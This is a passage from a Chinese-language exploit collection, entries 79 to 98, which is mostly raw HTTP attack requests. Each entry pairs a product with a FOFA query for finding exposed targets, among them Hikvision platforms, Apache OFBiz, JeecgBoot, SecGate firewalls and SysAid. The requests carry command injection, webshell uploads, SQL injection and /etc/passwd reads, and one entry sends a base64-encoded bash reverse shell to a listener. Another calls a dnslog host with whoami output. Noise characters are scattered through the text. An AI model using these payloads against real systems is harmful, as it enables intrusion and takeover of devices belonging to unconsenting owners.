' V2 u9 q O1 X1 ~------YsOxWxSvj1KyZow1PTsh98fdu6l--
* V, F6 u% {: @6 [+ Y# G8 f! V$ y' @ B" p' p3 j
; V B5 { T( r
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.10 \# g' K9 [, Z7 G; Z
Host: x.x.x.x
$ ^( j# A4 B( Q \ o& {# s! p" w8 G4 v) Y2 K0 I- M
1 o) ?% X" V% m& v; ~
79. BYTEVALUE 百为流控路由器远程命令执行% F6 B1 Z J9 q9 r1 I/ c6 o; F) c1 [
FOFA:BYTEVALUE 智能流控路由器
L4 G) X) v e) L# Q* e. jGET /goform/webRead/open/?path=|id HTTP/1.14 N) C4 @% p! ?! X
Host:IP
) M2 E& q3 p x; F4 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
& E7 n ]3 G" u5 M" a; q3 h9 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 O" s# S5 Y; D* M9 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 [- N1 k9 H& A8 BAccept-Encoding: gzip, deflate
- e* D* s3 \. x. `4 \; GConnection: close
7 X- A L' {( K. W* @Upgrade-Insecure-Requests: 1( X6 A" y8 P g5 a/ D* V
% @' B9 s& K& L
: `( T N, M0 _' P& b
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 j0 `; L, @* k U& W3 r
FOFA:app="速达软件-公司产品", Y! n2 C; N; d% q
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
8 |1 J. h9 ^7 F1 M! p! bHost: x.x.x.x7 I4 m$ \' H. N% o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( w1 C: n9 r0 U& s4 K$ H
Content-Length: 27 y9 `& \9 T/ s! x3 ~7 {; G$ Z$ F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 p7 L* `7 x0 n
Accept-Encoding: gzip, deflate7 l* L% p% | \$ w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& h2 _: I" ~' g \) g0 P
Connection: close
* V7 ^, `6 S, y O; pContent-Type: application/octet-stream" V: l: o+ U" N9 `1 ?6 Y. x
Upgrade-Insecure-Requests: 1
6 D9 A, q4 u$ n3 H4 u2 U8 }8 ?0 Q& a1 } w5 Q- o7 ]4 V! T' F, ?9 `
<% out.print("oessqeonylzaf");%>
: d% }, ?# w5 ?" K: `( ^- H P
! I' b+ a. |# s4 F
& R. c! n- {; V( ?4 {5 MGET /xykqmfxpoas.jsp HTTP/1.1' w; z0 F! `* m/ o
Host: x.x.x.x
/ N% E) e" T4 }- o/ VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ L! ]* K, ]# n: m6 WConnection: close
* x e, l& P2 e! ^Accept-Encoding: gzip
' F8 k; V9 ?( d* N* D7 }0 w5 r. U+ E7 R8 p
: O2 ?% D$ K/ z0 T81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
# f, R# p! C. W; `0 O. \FOFA:app="uniview-视频监控") a, \4 v: I) L2 H. w9 C: ?8 C% ]
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1/ x2 \1 b" \" s5 T$ S. y5 `
Host: x.x.x.x' I3 l( T. ?/ {0 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 H' i5 Z1 Y6 ]& {: |- [# w
Connection: close
7 G" z+ @ j9 C8 xAccept-Encoding: gzip, U1 r, f7 I! _$ X* q
- `# E% V3 l7 u9 w4 S: D! J" M7 \' Y, B
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行7 Q3 |) Y" S u8 B) G. i
FOFA:app="思福迪-LOGBASE"# b4 P6 l& Z1 ?1 [7 H
POST /bhost/test_qrcode_b HTTP/1.1
9 Y" |( u* ]2 m6 IHost: BaseURL4 L0 c( u/ p9 a8 I2 {: I$ g9 D- ^% z
User-Agent: Go-http-client/1.1- ~! x$ |5 F" H) Q# v( r: n
Content-Length: 23+ `4 I9 D, l5 }) r( [; v7 z* f3 y7 I
Accept-Encoding: gzip! s( v( r; y8 F: ?; r
Connection: close; _ \5 `( J0 x) f7 j8 U: t
Content-Type: application/x-www-form-urlencoded
* d6 r. X" ^4 G! KReferer: BaseURL
/ I# v7 a/ V6 X! r& W) V0 J6 B7 G9 S0 ~$ ?8 [4 h1 t3 e
z1=1&z2="|id;"&z3=bhost/ S9 k1 g% k7 n7 d' s! s) x
% p0 c, n9 J7 k% g) w9 C" Y Z' M [" s: b; l! |3 b
83. JeecgBoot testConnection 远程命令执行
) s1 H6 L/ ?- S* {. y9 ]/ U8 t9 \FOFA:title=="JeecgBoot 企业级低代码平台"
; Q2 l( [ [5 r) y) q g8 o9 j* x9 ~2 X5 {+ ?& Y e
: X% C' R) z3 B' ]8 C; T
POST /jmreport/testConnection HTTP/1.1
2 }9 [9 I/ \# w# H7 K0 [Host: x.x.x.x1 ~! W/ c/ N: i3 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# C& k& E3 @$ n* l) @3 P
Connection: close
/ L$ Q" ]- V4 AContent-Length: 88810 N# a4 u: `; {+ F9 `
Accept-Encoding: gzip
7 Z, q+ B, S8 f3 wCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
% E! F/ a" i2 G) RContent-Type: application/json
# ?1 q/ ^0 i# C/ J8 F
5 }& G; _' [8 N" b UPAYLOAD+ k1 `5 w7 j9 |) Y3 ^, B$ e
. c) Y3 z. L$ Z& l) m/ I' L7 G
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入+ D4 v& D& O1 G( S8 `8 ?
FOFA:title=="JeecgBoot 企业级低代码平台"
, q u( L& B% a" ?3 r7 e
! s( }$ V4 J) R; |+ p; L# F) d% V
5 J+ X7 m* K. M0 G$ G9 p) q+ M- _
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
; y. `& k9 e( i0 d9 Y2 R& D: `Host: 192.168.40.130:8080! l/ T4 \3 ]( n2 v2 j) k
User-Agent: curl/7.88.11 G7 r* O# u: F9 O# ]6 Q8 y, i# O
Content-Length: 156
, N- { n4 @& oAccept: */*# e. S1 ]% d( U n4 e
Connection: close
2 d0 T R R9 n4 v. h# JContent-Type: application/json
5 }$ h0 B9 j9 k, |0 rAccept-Encoding: gzip
& q% p3 _# F5 G' C' d- E N
; [, ^/ }6 ^- w$ e% O) i, N{
9 w, f8 }4 [1 H u4 h& U! f% v2 A "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
3 ?7 U1 _: u! H "type": "0"5 L. V$ c8 x: A7 r( ?$ |& g
}
- H2 [/ ?6 J/ E0 K- @* _& X" M6 w" G6 g O% i- v
9 N* B7 q4 O [" s
85. SysAid On-premise< 23.3.36远程代码执行
! K3 O1 M7 _# r' I: }8 i: MCVE-2023-47246* _4 b5 S4 |. F# C; R* |; N
FOFA:body="sysaid-logo-dark-green.png" 8 q6 X/ C5 k# U& d8 x
EXP数据包如下,注入哥斯拉马
) R, A1 z; J) Q- l% e* }POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
2 w& U& P- |8 A: S* U; cHost: x.x.x.x. X: U" x P8 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ D$ f5 e$ t: h8 r _
Content-Type: application/octet-stream, N# N( Y8 _9 D4 V* i- Q4 v
Accept-Encoding: gzip
2 ]0 ^7 {. k5 k6 f6 w- f7 J* c. O$ r4 {7 L% x) b" a
PAYLOAD6 T* a2 G* h; ~5 a# ~
+ v/ b$ f5 E5 D' g6 T
回显URL:http://x.x.x.x/userfiles/index.jsp( c0 D% O4 Y$ v( ` I
) V3 w0 n+ m3 P5 \) ]3 a, U
86. 日本tosei自助洗衣机RCE5 e* }" }0 m% v" @9 @& a% ?
FOFA:body="tosei_login_check.php"
[. K5 ?, x( n# ?POST /cgi-bin/network_test.php HTTP/1.1* O% Q& e' u5 [+ p0 ?% X d: o% G+ K
Host: x.x.x.x
. N& L" ]/ _ t! F4 P& _, ZUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
9 z4 _% |, n: {$ C4 r& Q$ D- b FConnection: close
# q9 R) W! [9 j) Y. J7 dContent-Length: 44
8 J& E5 k3 f$ q6 ?! m a9 K( K& E. TAccept: */*# g. W5 J: A _* o- Y
Accept-Encoding: gzip$ M) @0 p( m! [9 S0 {' N+ U2 k5 x; F* s
Accept-Language: en0 {" ^1 m$ [, W, k+ Y. ]' o
Content-Type: application/x-www-form-urlencoded* a; `& j8 a0 e7 N+ f4 s5 b
( u; u& a U* ~7 e
host=%0acat${IFS}/etc/passwd%0a&command=ping: p3 {+ P3 o; A' C
5 P! q4 Q' ~- y3 @; o7 H
- a; }+ a# ^( |/ @2 Y: T$ {% z1 g87. 安恒明御安全网关aaa_local_web_preview文件上传" p5 M- _0 K9 ~- h1 m8 k- }9 \5 y
FOFA:title="明御安全网关"3 F4 b, _" w' }
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.18 a5 }: Z# H1 w l
Host: X.X.X.X; Z! |3 f5 \1 F9 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ H, ]! U) [$ W
Connection: close
2 `) D9 |( e4 |1 \- ]Content-Length: 198
' C6 \" Z* Y# v2 x2 bAccept-Encoding: gzip4 [, w2 f/ I0 j5 H9 D4 `5 V- @
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd; ~* i9 [9 s3 ?/ t( ^
2 D4 w! O3 @9 H9 D--qqobiandqgawlxodfiisporjwravxtvd
: r6 l* K# ]* Y. VContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
" e0 W. h0 v) C0 VContent-Type: text/plain
2 Y: b& E4 a s$ ~3 Q# u6 p
! @0 g/ x( Q5 S/ O! h2ZqGNnsjzzU2GBBPyd8AIA7QlDq
" v8 S% T# V+ W4 M1 S/ X) g! H--qqobiandqgawlxodfiisporjwravxtvd--
+ D/ t0 k. ]% Z/ }! }
# Y1 @3 v. E- b& G3 S- P8 w ?. q& \
1 g6 A" A; l7 T; ` Z6 K$ b8 ?& a/jfhatuwe.php, |: R4 B& n' n
2 f, I) \3 H. j- L# I; P88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 h# w/ x1 T3 X C( k- l' F% |FOFA:title="明御安全网关"
4 ] p" l3 Y }GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.17 {6 g4 B& N: N' |, x
Host: x.x.x.xx.x.x.x" c, ^: _- ?2 t, J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# j. c+ \/ x8 o/ `/ B% ~" W) ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; J' A& m& f+ X) g
Accept-Encoding: gzip, deflate& L+ [! \/ |& \$ ?, V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 `7 N6 o" o8 y$ j {. ?0 E: vConnection: close
, W0 a- n8 s% x! V
8 _1 z% d9 w7 m0 e" g0 H3 [1 b6 Z: Z2 b8 ~6 l& P( y
/astdfkhl.php& n0 o& Y/ V3 F9 x" i0 B$ [! v
% V2 ]3 a$ D$ a4 `2 M- d: o7 a# Z89. 致远互联FE协作办公平台editflow_manager存在sql注入, t/ J- T% n9 ^2 h7 b7 X- D
FOFA:title="FE协作办公平台" || body="li_plugins_download"* g" f6 o$ R, U h) k, Y
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
( A, M2 k( ]% q* f- D0 k$ aHost: x.x.x.x7 {" s+ ~7 `' P! y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
^9 f* H3 R$ z5 D0 T: HConnection: close
; f. c& q; P7 N7 W% U4 wContent-Length: 41
9 Q- _5 _) _+ gContent-Type: application/x-www-form-urlencoded
3 q9 D) M6 n' @Accept-Encoding: gzip
3 \( v! ^' \3 m" i& `3 F- y$ _2 n# ^* S; R' C8 P. d
option=2&GUID=-1'+union+select+111*222--+
* `( @, k3 G. |4 q, W" q/ o+ ?. C4 e* P% n9 a- u: M- p
8 I0 L: b4 E; S; O, u. `, ?" h2 d
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行6 f0 a2 j, U4 R
FOFA:icon_hash="-1830859634"3 F: S- _- q; j( m2 ~ L9 D& Z
POST /php/ping.php HTTP/1.1
& x/ g) D9 \" Z$ K( s9 sHost: x.x.x.x
- d; V x. i5 y _' ~$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.00 f& E& j. o2 u
Content-Length: 51
e( P% ^& z( a; p; k, sAccept: application/json, text/javascript, */*; q=0.01% e$ Y: {/ v+ U+ G' G3 {8 L9 F" N9 l
Accept-Encoding: gzip, deflate! `/ v. X3 t9 m" F' }. p% s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" _& V. }3 i3 q, g) `% G
Connection: close- D3 q+ ^3 `% ]# `
Content-Type: application/x-www-form-urlencoded
3 {, }# m+ w/ tX-Requested-With: XMLHttpRequest8 B6 D+ X- F3 l- R3 U7 c0 c; V
: n4 c9 c" O! u c4 o
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
$ T* P: ^/ d$ q3 _8 |" }% w( a/ z' l: w9 Y' ?" {4 t0 h
8 ~! H- T0 C- W s7 Y/ \1 I
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
' m0 |8 i$ J- d1 u. P- {FOFA:title="综合安防管理平台"
, J; D. o; f! e: W( t WGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
4 [/ S |8 G. G8 B' kHost: your-ip
6 A2 }0 Q8 F4 m0 Y f/ _) AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% [: ]% y0 ^, T A) \Accept-Encoding: gzip, deflate, E2 w6 r! @% ^8 ?
Accept: */*
9 |) a" U8 D/ q1 [- N- _" `& `Connection: keep-alive
0 v; u& |$ P4 A+ Z+ s1 Z/ f1 J( w& o2 V5 c& _) A
' F' _; x: _5 K. c5 y
9 a6 O* g0 P& f; N& v92. 海康威视运行管理中心session命令执行' d* @" M" i3 ?. u6 M
Fastjson命令执行
9 I4 |; S/ E$ phunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
/ M$ ?$ S3 D& Z' }0 G2 h" C( a0 qPOST /center/api/session HTTP/1.1
1 m4 |5 E' Y& a/ d, c1 Y3 | u/ pHost:3 z: N3 _ T" P: F; b
Accept: application/json, text/plain, */*; d5 q1 `5 O4 Z) ?4 K2 O0 D
Accept-Encoding: gzip, deflate4 J: w: [" e, T
X-Requested-With: XMLHttpRequest" ^( S7 E7 H R2 Z6 K C7 T
Content-Type: application/json;charset=UTF-85 G! N3 f- H5 `
X-Language-Type: zh_CN- \! ~( R" v( \7 F& e
Testcmd: echo test
+ a. ], O O9 B( p5 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
8 k* g+ r2 @% e& a. KAccept-Language: zh-CN,zh;q=0.9
# e7 ]$ ~' u6 a! }Content-Length: 57782 `! Y4 h; r! O2 [+ E
" F4 P/ g* p8 c% N2 b3 x( Q( DPAYLOAD% |, M" c; z* U% W1 H
1 s1 q( n& r( |2 u( C8 Y
9 n. n4 f+ z4 x3 `6 @) w/ a93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" l N* I, Z6 _* O; _* a$ T8 T4 |
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==") o7 {1 b8 @4 z# E" @5 w1 c3 b
POST /?g=app_av_import_save HTTP/1.12 n% X8 {) B) p% G2 O9 n6 B
Host: x.x.x.x0 ?" m/ C7 o9 E; T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
6 H! w8 c* Z. V, o3 s- c4 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* E# |' c! P) ]* X' ~* ?
4 y1 w& q& q6 ]' t! f------WebKitFormBoundarykcbkgdfx/ u- a" F. k4 U2 \6 ~$ F4 A, `
Content-Disposition: form-data; name="MAX_FILE_SIZE"& E7 ]8 z. J4 _
" N" z3 o' b9 W# f6 z
10000000
# w, Z7 ]' K: K; v3 }) F------WebKitFormBoundarykcbkgdfx
x) a4 {3 t) OContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"4 m0 I. C0 J5 T f* I1 d" E
Content-Type: text/plain1 `4 r s% U1 w3 Y: {6 d7 |' h
/ B, i1 v# F$ \# b- E( \wagletqrkwrddkthtulxsqrphulnknxa
9 z2 G3 B; Q! F% |. ?4 ^( F! L------WebKitFormBoundarykcbkgdfx x; Z8 x1 Q- Q! ~- L
Content-Disposition: form-data; name="submit_post"
# z2 h" N, S# x9 ]
m; a0 S) Y+ ~+ b8 L* B& Zobj_app_upfile
& @- t6 n) Z: G1 @4 [1 x------WebKitFormBoundarykcbkgdfx
, _5 a$ Y' a4 @1 i$ ~* fContent-Disposition: form-data; name="__hash__"
7 H$ F/ [0 D1 ?, G# {" j& E5 d
5 t( [8 A9 C! ?- q' D7 [0b9d6b1ab7479ab69d9f71b05e0e9445 g) l* Y2 {+ b/ D8 x
------WebKitFormBoundarykcbkgdfx--4 U5 n- I0 T6 y$ m! l) f
' Q Q d; ^' b2 Z7 t
! A" G6 f. K1 f. P6 lGET /attachements/xlskxknxa.txt HTTP/1.1
; P2 V6 u( E) V' b, [' FHost: xx.xx.xx.xx( j& v' g* E! D" b, T# `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 V0 ? X) I+ N4 c! {
& T5 W$ O' ^+ @1 u* q' E! M
# g) j. P4 [. J6 i+ m/ X94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: ?. {; ?$ M* W7 v4 m' oFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="$ B, t& V/ E2 D7 T; C. A+ y
POST /?g=obj_area_import_save HTTP/1.1% A2 s( d+ Q. W3 Q
Host: x.x.x.x' Q5 h; x# z7 c7 t Q3 M3 J2 Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
$ S# K! H: u. \. v. P& M' jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; N3 ]7 _4 L/ u, X# X
% J- D* t: O3 h+ e8 V
------WebKitFormBoundarybqvzqvmt+ I1 a! g, S4 P3 a$ a. k4 n; o
Content-Disposition: form-data; name="MAX_FILE_SIZE"& y: O: ^* `2 w4 N( T. R
3 X& \* u& ], v/ a
10000000
/ m4 I; [* ^. f9 J7 g" W------WebKitFormBoundarybqvzqvmt
& P. o; y6 @" d. F5 OContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
& ~9 M5 C# ?$ D, }, j$ m% P pContent-Type: text/plain
( }& r1 y+ b3 [- U0 G9 Z* D! F2 W& K- v5 F3 X1 b, e
pxplitttsrjnyoafavcajwkvhxindhmu
1 `- k' S1 z6 x------WebKitFormBoundarybqvzqvmt! {4 {- L! T+ f% O( ~& G; H, |
Content-Disposition: form-data; name="submit_post"- f2 F) h$ \) {) \0 ^/ i
2 ?7 ~4 e" b0 [# x
obj_app_upfile% a+ S0 y- W' v) ~+ X" a" f7 N
------WebKitFormBoundarybqvzqvmt
! z1 b* Y3 P9 DContent-Disposition: form-data; name="__hash__"
+ x" X8 g: a m+ M# j( M
( k$ N- H! \* g8 L! q4 N2 \0b9d6b1ab7479ab69d9f71b05e0e9445
) e( E* d3 k" k8 e7 D3 K: L------WebKitFormBoundarybqvzqvmt--* H8 X3 A0 F6 ^3 d- q
0 k3 d7 }3 _( V5 V
- z0 h( H" D% Z1 m
* b' Z2 s, O5 G& [* M0 C& y' w5 {GET /attachements/xlskxknxa.txt HTTP/1.1
0 T7 R0 v0 V, PHost: xx.xx.xx.xx
2 ?) j# e% E' gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% C8 o" ~5 R% w1 q9 G7 B8 }, \. `" p s6 L& ]' y
5 t% e1 h2 b: a* i- Q# e% S. v5 T6 S' ?
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行- A/ ]* g5 E+ L1 p
CVE-2023-49070; S% P) i5 @1 a- T! `% m1 G
FOFA:app="Apache_OFBiz"
) N: F: t( N8 P" i/ `& e/ LPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% V( I! g' y( r# O$ t
Host: x.x.x.x
; Q; U! x0 i1 x; y. O6 }6 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, C9 R% \0 ]; C# N9 aConnection: close; E8 k* X/ Z! z8 ~0 q+ x, H0 K
Content-Length: 889- E7 y" d- Y; R( @0 R
Content-Type: application/xml9 \4 m; O# J. B# u+ F
Accept-Encoding: gzip* X3 j- \7 w# }% [! g
7 O1 x# w a- l ~
<?xml version="1.0"?>
- d7 k) V8 z' a+ C$ ?) J<methodCall>
' W' E% B- W- {2 n# a# ^6 Q! c2 J <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
7 B+ ]: m s- ?6 } P2 {9 J <params>' @" }9 a S( w8 `; w; S
<param>
* K3 v3 {5 l2 v! ]5 I <value>. q5 D. Q( H, [0 X8 U6 l
<struct>$ f% H& m3 y) F3 }) ~4 L
<member>
% D, A# Y, m/ e8 Y5 j# p <name>test</name>( D, x( \& |. |/ H! Y
<value>
" a7 S% s2 g( U2 t8 t <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
# i4 Y b! h% a. h6 ` </value>: N7 S& `9 F0 L
</member>
: G+ h3 G8 T1 z </struct># d. C" L% A0 j; g4 r4 p
</value>% }. h; M0 {& \' @
</param>
8 \: N# L1 i3 U5 ~; v; B- ~+ _+ _ </params>
' H; L5 O* E" T5 a# a</methodCall>
/ ]( ^1 ]# M) R2 T' ?. n1 M
* P+ k: z6 n+ g t7 I; s
* G; r6 {2 K% L; g0 j. V1 u用ysoserial生成payload0 x5 b& n, x* D* k) @
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
" B2 w4 R& }% c- ?; N9 y z
5 ~0 V7 v0 N8 `% J3 f1 ?& S t* y `2 v8 y$ y; v, d
将生成的payload替换到上面的POC
7 D* x+ ?2 G1 e+ Z6 M; G# T" nPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! q4 f7 S' v1 b* Y
Host: 192.168.40.130:8443
* M G1 ^8 X& X6 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 V0 q9 _2 H" a* V3 C/ h
Connection: close
" C4 ] C8 i) y( w' A4 dContent-Length: 8892 L' D* K8 _( o: H& U2 H
Content-Type: application/xml
$ E% Q8 x5 `7 a4 d' l! XAccept-Encoding: gzip
8 e7 v; @9 R& {
: c0 m8 C# k Z: I" p: E% \PAYLOAD- R2 a$ Q/ c0 }5 D L
5 x! C* t& o. u4 x) s
96. Apache OFBiz 18.12.11 groovy 远程代码执行9 Y/ _& n7 S% o( [) L Z+ N
FOFA:app="Apache_OFBiz", b2 j# v3 Q; O
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: `. v7 O4 V; v8 pHost: localhost:8443& Y2 l: N0 j' x, k: i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: w" j; |# f$ P# G4 P
Accept: */*5 r! n7 {+ ~ x( V0 J9 L; s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. k0 G" O( c' e+ [+ eContent-Type: application/x-www-form-urlencoded. w7 o/ M! t; Q; r
Content-Length: 55
0 M! D0 ?4 U- Y+ {, |% E) l/ M. V. e. b l$ y& y
groovyProgram=throw+new+Exception('id'.execute().text);
2 a, m: B1 L) V2 h8 c- [2 q$ g5 K3 r! y0 P- g% `
& f1 `. j# b( Y" [$ h% W2 R% C反弹shell0 T. A* f* j8 ^2 u5 ~/ n! x. ^& m- l1 D
在kali上启动一个监听/ c; T) G( J) K" u
nc -lvp 7777
5 c2 ^, w; {' {! e" t/ ?
8 d3 w* ?/ O" ?$ c. k; k) ]POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1. w+ }6 I2 u+ G7 |
Host: 192.168.40.130:8443
) V6 @1 x& q, N5 w6 R" K' |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# l3 P. L9 R% b5 a
Accept: */*
9 }2 i" U7 u! a+ h* S7 w& |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- [" X3 E" @6 F4 O" d! W8 FContent-Type: application/x-www-form-urlencoded5 V7 i4 {2 I$ E% ]& Q6 f! H- H
Content-Length: 71- A& Y8 B P e4 g1 v7 g6 U, H
: s# L+ P' s7 y
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();0 J, q3 ^: O; Z0 D/ L% o; C
: G( N' [7 f6 |
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
- z" t+ O2 x$ `9 b" E9 T1 aFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
1 t5 {: w- Q6 A" ?4 gGET /passport/login/ HTTP/1.1& y. u1 Z' ^% G: o7 z! C1 K0 E
Host: 192.168.40.130:8085
: N. |4 R* u; i6 W" |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 X) K0 _9 @9 L5 YAccept-Encoding: gzip7 C3 H7 p& q H, |- \
Connection: close. S& i5 S! ]; s4 b$ q
Cookie: rememberMe=PAYLOAD
$ x7 H. U% _0 U" y" J1 t0 z4 V- NX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
; T9 P( P2 L0 t3 {! i5 g0 R
; E8 E( J0 x1 `2 `" z
0 A; n) v5 z8 ?8 i8 [' J9 t98. SpiderFlow爬虫平台远程命令执行
* c4 y. v# ]) h2 f, k' wCVE-2024-0195# Z$ D- d# j7 U. R
FOFA:app="SpiderFlow"- C6 S5 x! \. e. V
POST /function/save HTTP/1.1
% W3 G& L6 d+ F( G5 aHost: 192.168.40.130:80888 u. e2 f# i8 O! l3 m' I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
r5 N2 ]2 s4 I! ]9 d, QConnection: close
# h8 q$ a& z7 i% L$ `* _* @1 V1 m/ vContent-Length: 121" X( x0 X+ _' c" J. Z! n5 f# f
Accept: */*2 T+ F* g9 n" q! g2 d* J9 Q8 p. a
Accept-Encoding: gzip, deflate l; r, ^3 x: l8 X8 e/ Z. u3 [
